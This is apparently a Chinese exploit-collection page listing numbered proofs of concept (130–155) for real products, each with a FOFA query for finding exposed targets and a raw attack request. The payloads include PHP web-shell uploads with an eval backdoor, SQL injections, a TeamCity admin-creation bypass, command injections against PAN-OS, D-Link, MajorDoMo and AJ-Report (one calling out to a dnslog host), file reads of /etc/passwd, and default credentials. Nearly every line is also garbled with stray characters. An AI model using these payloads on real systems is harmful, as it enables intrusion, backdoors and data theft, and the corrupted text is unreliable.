uuid: 85f60018-a654-4410-a783-f81cbd5000b93 b- W" T, |* o, \. e! X1 k" b
/ p/ t0 _+ I1 w
7 Q+ E- p) t5 H5 O& @130. Laykefu客服系统任意文件上传* i, [7 a' q, T9 K$ T/ C7 q7 E; {
FOFA:icon_hash="-334624619"
1 ]' K& e) c, f& X/ P! |POST /admin/users/upavatar.html HTTP/1.18 Z" a% c% H' s+ x
Host: 127.0.0.1
d1 I; S0 {* Z% R0 l1 C5 BAccept: application/json, text/javascript, */*; q=0.01- G, N) X7 Q+ y0 `! y
X-Requested-With: XMLHttpRequest
5 C5 ^, G5 c$ j6 G! i! z. P& V9 W! CUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
2 m8 j- `! r4 c; d$ }7 J4 ~" PContent-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR' {8 U$ L% N% U/ v. u
Accept-Encoding: gzip, deflate/ Q% h! s9 c3 N! @
Accept-Language: zh-CN,zh;q=0.9. Y9 `; U, k/ i7 c1 A
Cookie: user_name=1; user_id=36 ?. n y; S1 L4 k) l
Connection: close# l3 `8 S& B+ t5 Y
: J( y" A9 @ T- n8 M" {/ U
------WebKitFormBoundary3OCVBiwBVsNuB2kR
" M( U: ^! X; g$ h" W% g3 V CContent-Disposition: form-data; name="file"; filename="1.php"' }6 v, M9 ]8 u. I; |
Content-Type: image/png
; l! E/ W! A% r! `* R% O
1 ]. k/ ]" u: e3 d! P<?php phpinfo();@eval($_POST['sec']);?>' w7 T. p7 A: u) Y
------WebKitFormBoundary3OCVBiwBVsNuB2kR--
: |- b. ^) f# q* Y: m1 Z. S) Q0 }3 [4 F
; H' @6 `4 g- q- n131. Mini-Tmall <=20231017 SQL注入
/ N+ _( r( B/ r$ e$ Z QFOFA:icon_hash="-2087517259"
7 j5 t- ], V. N5 p' Z后台地址:http://localhost:8080/tmall/admin& N; v1 V4 r; `" k
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)5 g3 s* W# p9 R# s. |8 v
$ O! G( j* U4 L% H/ H132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过2 r) t& Q5 M, J0 D# P$ g8 u
CVE-2024-27198
: f- N! y. t+ _8 X! lFOFA:body="Log in to TeamCity"# M, g0 L6 z$ g( p
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1: @1 E6 x3 J7 O% s$ _
Host: 192.168.40.130:8111( A: V; R0 i; P& l7 j% x P% C/ |* ^- V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
( \' G" I7 J& R. i) UAccept: */*
9 `: [2 s% Y ^& x6 |& W) KContent-Type: application/json
; P f$ i/ E0 D* {3 LAccept-Encoding: gzip, deflate
( C! \$ g& D' S$ f2 x0 c) b; Z' Q
" L+ T1 O- f2 B. A. h$ n. A{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}+ Q6 p$ e; J* b4 b+ x! E
& \& ^2 ?0 M9 l' S
$ G" u$ j7 T4 l$ } |/ n! F4 cCVE-2024-271996 G k, |" m+ K, g2 u
/res/../admin/diagnostic.jsp
3 {5 v1 h' @. v/.well-known/acme-challenge/../../admin/diagnostic.jsp7 t! e" A- G$ B& o2 R
/update/../admin/diagnostic.jsp5 E0 n. w7 \" A, y
2 r& W" |5 x/ E! y6 O" C# }) i
! t3 y+ j% F, d) w
CVE-2024-27198-RCE.py
! P7 g3 y4 Z! h0 w) c' ]8 Y$ ]6 y0 C6 l
133. H5 云商城 file.php 文件上传/ f0 u+ M' W0 @" Y4 I' p& D
FOFA:body="/public/qbsp.php"
$ P/ P4 _4 X; j; y& H) U5 t3 hPOST /admin/commodtiy/file.php?upload=1 HTTP/1.1. l- E6 @* Y `) b/ |% k
Host: your-ip) a2 [% d6 G2 E: s1 S) _
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
9 H6 T) r# `6 aContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx
% J' p2 n4 C, y u& I& l8 m
3 M& w6 p) f/ U------WebKitFormBoundaryFQqYtrIWb8iBxUCx. j. ]; N. _9 q
Content-Disposition: form-data; name="file"; filename="rce.php"
% `1 Z2 k+ \* h0 V2 n) {Content-Type: application/octet-stream$ \/ V0 h) d1 t" i& W, H+ w/ U
/ l& `0 P* m. \
<?php system("cat /etc/passwd");unlink(__FILE__);?>" ?& m; O/ i6 Q I( |
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--8 Y" M; ]) H( t+ ~$ h! p) V4 m& n
, ~; m8 o' X; H8 R$ Q( Q
, A8 b4 [: L( m; x0 C4 i n1 N4 r; r7 `5 W
134. 网康NS-ASG应用安全网关index.php sql注入
5 T* f3 } F7 @3 J& |0 O8 ~CVE-2024-2330
% A A5 E& T% U7 Z4 o QNetentsec NS-ASG Application Security Gateway 6.3版本: Z. g. w! s' d3 J" I* @
FOFA:app="网康科技-NS-ASG安全网关"# z" B' A* p7 |3 X \4 \ n/ _
POST /protocol/index.php HTTP/1.16 P0 m0 V) p5 R+ _
Host: x.x.x.x
/ j5 c/ G; |) N' j7 Y" xCookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de5 ]! i7 {) ?. |8 E% a
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0: \; D# f7 \( j& F3 W" m9 Q
Accept: */*7 P& W6 v; F& M. q4 ?* Z
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.21 X8 q$ T6 ]0 l5 Y
Accept-Encoding: gzip, deflate' N0 E) Y" w9 ~5 O5 K
Sec-Fetch-Dest: empty
8 Q1 L9 P! S% P# p" Q* Z# ]Sec-Fetch-Mode: cors
+ l$ ?2 A7 M7 ?) C/ l. tSec-Fetch-Site: same-origin
% q0 E' s# F4 X$ k, ~Te: trailers/ Y8 e8 ~( j* z/ d0 k9 h
Connection: close; q! Q3 t8 W6 t- X; w& U% Q5 l
Content-Type: application/x-www-form-urlencoded
- Z0 ?, @7 X5 B5 Z2 WContent-Length: 263
6 B# o% K! N2 m. j
1 g& k$ B2 s, T, z! t* P5 _4 ]# pjsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}! h+ z* a- b3 N0 w
6 o: B {, N- z
& Q$ o6 m* f1 q+ r7 D
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入* b0 U7 v3 r+ ?7 E' c
CVE-2024-2022
% y1 m6 { \7 KNetentsec NS-ASG Application Security Gateway 6.3版本
. _& s/ @7 x# p- N5 lFOFA:app="网康科技-NS-ASG安全网关"
7 F/ ~: P* H7 D0 O5 ^$ @GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1$ l* Q' E- ^: ~" z) x9 B
Host: x.x.x.x
3 K* o. e& |) bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36% f% k9 }( z* I, t( | A% B
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
6 h0 y3 {; {6 M2 i( H1 C kAccept-Encoding: gzip, deflate
) r4 g$ x& n" v: kAccept-Language: zh-CN,zh;q=0.9( t- R4 c) h1 L4 G1 |) c$ E" B6 W
Connection: close8 ^. ~/ E! t9 N- V% `' r& s
1 x; a( K: o" C+ F- T! h
3 @8 V. U7 y" I& |136. NextChat cors SSRF
# T1 A. B# g; b& UCVE-2023-49785
, Y Q& V& G, h5 nFOFA:title="NextChat"4 y" z* @- }7 T7 Q
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.18 r3 W$ j) ]+ E' Q" M6 [- V+ i- b+ x1 O
Host: x.x.x.x:10000
& J. g6 ~' h, y w! O2 d, eUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36/ E( u, e) v, M/ M. h* U! }" O
Connection: close y+ I. ^* ^9 r# K
Accept: */*
! ^* L$ h5 q1 zAccept-Language: en4 j+ n8 m# v+ z, G4 ^, ~4 R# ^/ H
Accept-Encoding: gzip
5 u: g* c0 ?' L; \6 p6 f. X% r3 \0 E; J. w
6 S/ r# Q. i4 C# Q/ e137. 福建科立迅通信指挥调度平台down_file.php sql注入# d G" z6 }- `
CVE-2024-2620
9 }) N. l) n- q" U: Y" ?- uFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
! O6 M- C5 M, b' N% uGET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1 \ b( n4 l, F; m
Host: x.x.x.x
0 G. F5 s3 N0 P" aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
" K( S1 I4 `- m$ A6 q1 }Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8$ o1 L1 ~" R# l+ L6 J3 g
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
/ n; S& v5 O2 }' C0 f4 PAccept-Encoding: gzip, deflate, br8 Z- q) M5 X4 N3 L3 r0 d
Connection: close1 }( s' v9 o0 V# E4 W
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
) |; b" S4 R7 U2 zUpgrade-Insecure-Requests: 15 i. s6 e7 U B& L! a8 E
$ z* l: {2 R& u7 \; X9 A3 i7 ?
9 @3 ]# L( W" |9 h. s, E3 X; A
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入( W7 J; `2 p1 y* t& f4 H3 P
CVE-2024-2621: Y4 |) W7 O) a& l- b- |2 ~
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"* V# j) ]+ Z9 b; v$ f' b
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
5 E) _% x! b' u6 [Host: x.x.x.x
0 g; z! Q, H( h& Z* k3 E& l- dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
4 l' T& Y* i- Z% u5 F; }Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8) k5 g, |: T g- t4 V/ t W+ a
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+ T% H3 t7 N$ s, LAccept-Encoding: gzip, deflate, br( s. H+ W" g( S6 W: T/ H
Connection: close/ E/ U: t; Z* J, m
Upgrade-Insecure-Requests: 1) J) }( l1 ^1 b _! V
# I- q2 V9 w: C! \* w
$ }7 {8 o( C0 j2 l( h) E139. 福建科立讯通信指挥调度平台editemedia.php sql注入: F- B1 F' O7 c% {, Y
CVE-2024-26222 n ]& z/ o3 d$ J6 l- f
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"& Y1 ^* f& v7 p+ m. j" O$ N
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1% F, ~1 k2 K$ L* _$ o6 E4 C
Host: x.x.x.x1 d1 P x* i. |' o: K ]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
" {4 m8 S- k9 f. T$ PAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
& `# E3 {- ~1 ]; i6 tAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: {, L7 u5 h6 P
Accept-Encoding: gzip, deflate, br. ~" @$ \* x' C2 D% Q$ u
Connection: close5 A0 e% v4 b# ~! J' ?
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
9 T6 N% {/ S3 {. X% v2 fUpgrade-Insecure-Requests: 15 e ~0 C8 M0 r9 ~
" T5 W& m3 p y4 I
% V& p2 B5 z5 z2 t7 h140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
6 J+ U& [2 ^- R) ]CVE-2024-25664 Q9 ]; L) G j
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
% u4 v) X( {: qGET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1' r. G' R. Y" H" K+ }6 w1 X
Host: x.x.x.x' x' v9 \' t L+ d# c% z+ q _
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
; z$ [6 x, [2 u' i' _3 VAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8! Q, V5 q- f" w" t$ G9 J4 ?
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 I7 n! |. y! z4 j
Accept-Encoding: gzip, deflate, br* K5 ]/ n4 @- S2 w. s1 Z) s
Connection: close
7 J" u# O5 |' x0 w8 R0 ` FCookie: authcode=h8g9
% ?: z% h! @9 R pUpgrade-Insecure-Requests: 1" {+ c/ X, C4 x& b
; i# T0 G0 i( b4 u& \9 r; u
& t0 u( ^1 j0 v. s* S/ H" _0 h, ]141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入* V; h& T* \ P3 g; O9 H
FOFA:body="指挥调度管理平台"
* u5 k. z) V0 [" C6 h- JPOST /app/ext/ajax_users.php HTTP/1.1# z5 K4 F; j( k) x0 L
Host: your-ip
* F7 }/ x# Q" I$ M! P* sUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info; w' ]+ `# Q2 A$ U! z
Content-Type: application/x-www-form-urlencoded
) k, u" o ]2 J9 x7 @9 b
) O# B, C- ?7 ~" M3 r( `+ w2 E- x) b
+ i% s: S- d; |2 Y& z" M7 {dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
2 n+ M6 `! C% W# O& F; t/ c- p) c( K+ u1 b- T- C
# N( [, p, n# |* [3 x0 H7 B
142. CMSV6车辆监控平台系统中存在弱密码. V8 E" [7 H" k/ Z
CVE-2024-29666* ^7 p$ ?7 y& v2 [
FOFA:body="/808gps/"0 I6 S$ l1 W4 S
admin/admin: H: e: b: b+ z8 u1 q3 ^1 ^
143. Netis WF2780 v2.1.40144 远程命令执行
/ d* t1 w) V/ l; oCVE-2024-25850
2 m$ j+ K* j: A4 a; B5 x) W5 J! H/ ~FOFA:title='AP setup' && header='netis'
W' F' W# Q: S% A! tPAYLOAD) Z& }) M1 n8 U4 l# K+ W2 F
# C% ]& n' l, |, J1 V" n; a( E144. D-Link nas_sharing.cgi 命令注入8 u" y: P; V: @: l
FOFA:app="D_Link-DNS-ShareCenter"8 K+ o/ N1 X' I/ t$ ~ ~& }2 [* l/ `
system参数用于传要执行的命令
* P) p8 F1 ]; G0 Q) h' o4 zGET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1+ K1 t# a, i3 u3 P$ ^4 o k
Host: x.x.x.x
( L3 u* i; d8 ?( G EUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
" U. m- A" a! u' K4 b6 A) vConnection: close: R _4 ?" v, C3 W2 w# ?" n+ G
Accept: */*5 b8 N: d" g. Q b: y- q% x( c: B
Accept-Language: en
6 D! ^' J" y! N/ N+ P. b) `% Q% kAccept-Encoding: gzip1 i4 ?' {* u6 h! |! p. X" T. z
# g) ~) U2 Q! o4 O2 @+ G9 Q/ ~% e6 V- {/ @& g! m) ]
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入# s* u+ F6 U8 \
CVE-2024-3400; L+ S" r. b: l8 D; H: u5 b3 u
FOFA:icon_hash="-631559155"& Q/ _4 h1 g! y1 v& k, N* I
GET /global-protect/login.esp HTTP/1.1
! G+ B( k O+ H( x, RHost: 192.168.30.112:1005
+ s& b- c/ Y5 m* FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
* V, _" [, \( n. t4 @% tConnection: close Z; y8 l/ C9 }4 `' O
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
# h. L+ A) k: c P( ]Accept-Encoding: gzip) Y: n3 S/ K: {: ~
) A( h% L+ k% B' H
o! ^ a6 K& x( |7 L- g146. MajorDoMo thumb.php 未授权远程代码执行# j# y! s P7 k3 e
CNVD-2024-02175
) X8 C% c s7 k. F. hFOFA:app="MajordomoSL"
$ U& C7 U& a" A" f( U* j- H( @& s4 _GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
" A# i' s& E0 UHost: x.x.x.x
! \6 i4 j9 [0 S0 n+ r2 ~1 ^User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.847 ^/ i4 f v" h8 J! V
Accept-Charset: utf-8
6 e( E h1 L; K4 ?) X& F2 eAccept-Encoding: gzip, deflate+ E2 T; d) d. \' c
Connection: close
: s7 [$ p' Y! W! E, m# n" m! w2 s5 p2 U) G) f: W; P6 P
# M& V+ P. |* o* C147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
: B8 s; V$ D2 I. SCVE-2024-323998 h7 u; W( D" e) G) l) i) s
FOFA:body="RaidenMAILD"8 j' a9 d# j! y+ k3 W
GET /webeditor/../../../windows/win.ini HTTP/1.1
! p1 [+ d M% U* OHost: 127.0.0.1:81
, H* b) v J+ A$ u: g3 ^( |Cache-Control: max-age=0, g* A6 z0 C# X+ I$ |
Connection: close
' M+ Q2 i5 ?- N/ r- X8 E' O8 m; R, u$ X( y, G
' E$ P5 z" _: D) F
148. CrushFTP 认证绕过模板注入
4 |4 |* b) r9 X+ @& J2 S% hCVE-2024-4040 B: B8 S4 Z* X+ G: u) `
FOFA:body="CrushFTP"
( o* q: g9 Z! t9 APAYLOAD; m! n3 x( `% d" ?6 T1 p0 m
' y# j6 a# `1 D% U) }149. AJ-Report开源数据大屏存在远程命令执行
& l h. g7 R" A5 GFOFA:title="AJ-Report"( q6 ?) s2 V" k
' C I* `3 l- [9 b3 `. OPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1
2 c6 I' u7 v# ?- `7 A7 DHost: x.x.x.x
- J) ^( T* v: Y, o7 Y, @. W9 FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.364 B* Q& z; C; S
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
0 y5 n& f" k. |1 tAccept-Encoding: gzip, deflate, br
5 z( g1 V1 L# W. LAccept-Language: zh-CN,zh;q=0.9
" D, U- f, J: eContent-Type: application/json;charset=UTF-8
# i1 X0 a3 E9 l8 @Connection: close
7 w. i" E) s* o5 z; q: L5 Y* ?5 M( r4 ]) t
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
5 g6 ~% }) U. S- u$ K; D+ E$ D+ K7 D7 f
150. AJ-Report 1.4.0 认证绕过与远程代码执行
5 X1 R# e2 a* QFOFA:title="AJ-Report"+ o. \ Q" T# r0 \% B% ~
POST /dataSetParam/verification;swagger-ui/ HTTP/1.11 c. W) d5 ^* m8 {+ k5 |% |8 z! z
Host: x.x.x.x
$ D* j1 U" a/ F0 hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
. @& [ ]0 k- l( H U+ _Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+ a, \9 W. M, y$ C8 I/ ~Accept-Encoding: gzip, deflate, br
$ O3 l8 {1 t. H( W0 v, M# E7 s+ J+ M$ AAccept-Language: zh-CN,zh;q=0.9' _9 i( W+ V- o% z- D& X9 ^
Content-Type: application/json;charset=UTF-8
8 u. ~7 i# L7 P1 WConnection: close1 v4 U( q, x+ A; W8 Y( O7 h. X
Content-Length: 339
* t- @3 D! L' r7 V) U7 I c
1 n" R) v7 B. u- Z{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}; b3 w- Z2 _3 K9 @* P8 j) N- c/ z6 i
# W$ Y3 |" D( z u! N; @
; y# n7 _& [, h/ r* V' @151. AJ-Report 1.4.1 pageList sql注入
3 K' |0 }0 D0 N1 zFOFA:title="AJ-Report"1 O4 A! F, |8 b9 L
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1+ r2 H# |! H( _# k8 Q
Host: x.x.x.x7 w) U8 L! A; c( D; f$ S- k
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.151 T; k% M' F6 V9 N3 @9 h: h( k
Connection: close" h5 t1 a5 K; @8 D2 Z* U
Accept-Encoding: gzip
2 N' `8 p7 y' ]$ L: s
) j$ k4 `/ A2 O. g! T
6 b1 d- w3 v7 ?7 V, R152. Progress Kemp LoadMaster 远程命令执行
2 `. k, d1 w L/ XCVE-2024-1212; N, W( N0 Q# x. B
LoadMaster <= 7.2.59.2 (GA)
9 V# p9 D# L( { e3 Y s' rLoadMaster<=7.2.54.8 (LTSF)
3 }* {% v# h- u, F. g+ d* X% vLoadMaster <= 7.2.48.10 (LTS)
! r: l+ q% N+ P/ A3 [- o8 T$ GFOFA:body="LoadMaster"% |1 N' X* b" V }* l$ ?* y& u9 i
JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码
8 V9 v/ W' x' OGET /access/set?param=enableapi&value=1 HTTP/1.1$ g( R5 K* t& o* p% p- Q/ t- Z
Host: x.x.x.x) N+ _ _4 @# ]" O9 V
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1: @' X" s/ {. R7 C! D, Z- {7 l
Connection: close/ y/ s% ^2 d; ?* O! u
Accept: */*
8 m: @$ _- U" S* u0 x) ]Accept-Language: en! U/ G0 `( g; F: H. p, b8 d, s
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=5 y" a$ Y7 k1 S$ Z
Accept-Encoding: gzip
* _; e- B9 }! V& O
+ d `3 e% V: T8 J7 l# k6 `( S+ P, F. P1 {9 Z4 [
153. gradio任意文件读取
: |% A7 N" p/ t- f+ r. u3 fCVE-2024-1561FOFA:body="__gradio_mode__"- P; T0 K0 L/ E
第一步,请求/config文件获取componets的id
2 b6 v2 }+ K$ {2 `http://x.x.x.x/config, Z4 v/ K% n- U
& k& i6 ]+ V. A: }# [
0 n' A, }. s$ o( u# e) ^
第二步,将/etc/passwd的内容写入到一个临时文件
5 C: i1 s: c9 QPOST /component_server HTTP/1.1
2 R7 |- p# L: \Host: x.x.x.x" i0 e0 p: ` v' w$ \! B# r" b
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
. \% |6 d. y$ @Connection: close
* D5 t4 _$ ]4 v, F1 j0 ]( E; d# F5 [Content-Length: 1158 C$ K2 h+ f9 H$ N0 t
Content-Type: application/json
' K% |: a. r9 P0 p, \( KAccept-Encoding: gzip. H, V: P. h. g# C
* Y. a" G4 A) S
{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
, P* \. d# j) W; Z
4 \' e' l' W: c0 C( S$ }
, z0 P/ O6 ` g; _* G/ d3 n* M3 R' G( G第三步访问0 r k* d. M, R' X& Z
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd
) J, m, n& N* v+ h3 u3 @, W0 ^+ }4 I2 J D. C
- d# j2 U& r$ e0 w+ o) }1 f7 O154. 天维尔消防救援作战调度平台 SQL注入/ |; A6 f, k0 V1 T, a
CVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"- ?5 p; h& x) b, A3 X
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
& w9 }& E1 r6 K9 F- ?! pHost: x.x.x.x
( \- m' t) a: E- @% U0 K6 TContent-Length: 106! b9 L/ |+ t" W& Q: Z6 u- ^
Cache-Control: max-age=0
* J9 ]/ X' a1 M# L4 kUpgrade-Insecure-Requests: 1: v# v: \! D" F
Origin: http://x.x.x.x
! U3 a, y4 u Y! y6 h5 s4 {Content-Type: application/json" P* Z! }9 {+ ^6 U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.360 j0 j# k& k6 g$ A" Y, W. z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7! w6 W: g* k4 B. z# L, g
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page: F- Z$ r2 [0 J! Z
Accept-Encoding: gzip, deflate( _3 n* V8 l, b
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
( ^2 G7 a! ?4 O4 PConnection: close) B: Z# ?% c9 U# S ]( [
8 R3 ^/ |6 w8 v+ h3 m{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}
3 k. l: v/ x% G6 f' M" O7 P% v- X4 R: n# ?- B- G8 m
6 a6 ^, P7 j+ L9 T: E, i3 K9 e
155. 六零导航页 file.php 任意文件上传7 d+ n# R- a8 q8 ~
CVE-2024-34982: t: I% ^9 L1 Q$ v
FOFA:title=="上网导航 - LyLme Spage"
) Y2 t2 b5 d' fPOST /include/file.php HTTP/1.1
1 H9 @7 o- l" u( G2 B/ E+ pHost: x.x.x.x
+ Q0 e) z \0 p5 UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.04 ?- N# q0 T/ i6 f. s1 ?
Connection: close
2 u" u; p5 z! |% kContent-Length: 232
3 z/ E- d7 }& [8 {9 c" O2 OAccept: application/json, text/javascript, */*; q=0.01: f, K5 _8 s' W4 E7 Q7 Z
Accept-Encoding: gzip, deflate, br
, O; m b0 \$ i: p: sAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ Z" B7 B( {' K6 `
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
+ @; H( K) s- C. Q1 R! }2 }X-Requested-With: XMLHttpRequest7 ~! M1 X+ J) i" G
) x5 a7 `3 T$ p-----------------------------qttl7vemrsold314zg0f* V5 f2 U1 u- g- m6 K0 g
Content-Disposition: form-data; name="file"; filename="test.php"2 m. h, W% x! y: O- v2 H
Content-Type: image/png
) {2 h$ e" R2 N. l# n$ j) R: f
4 r% V4 d: R( S# Z<?php phpinfo();unlink(__FILE__);?>2 `+ U9 s2 ]3 a$ Y
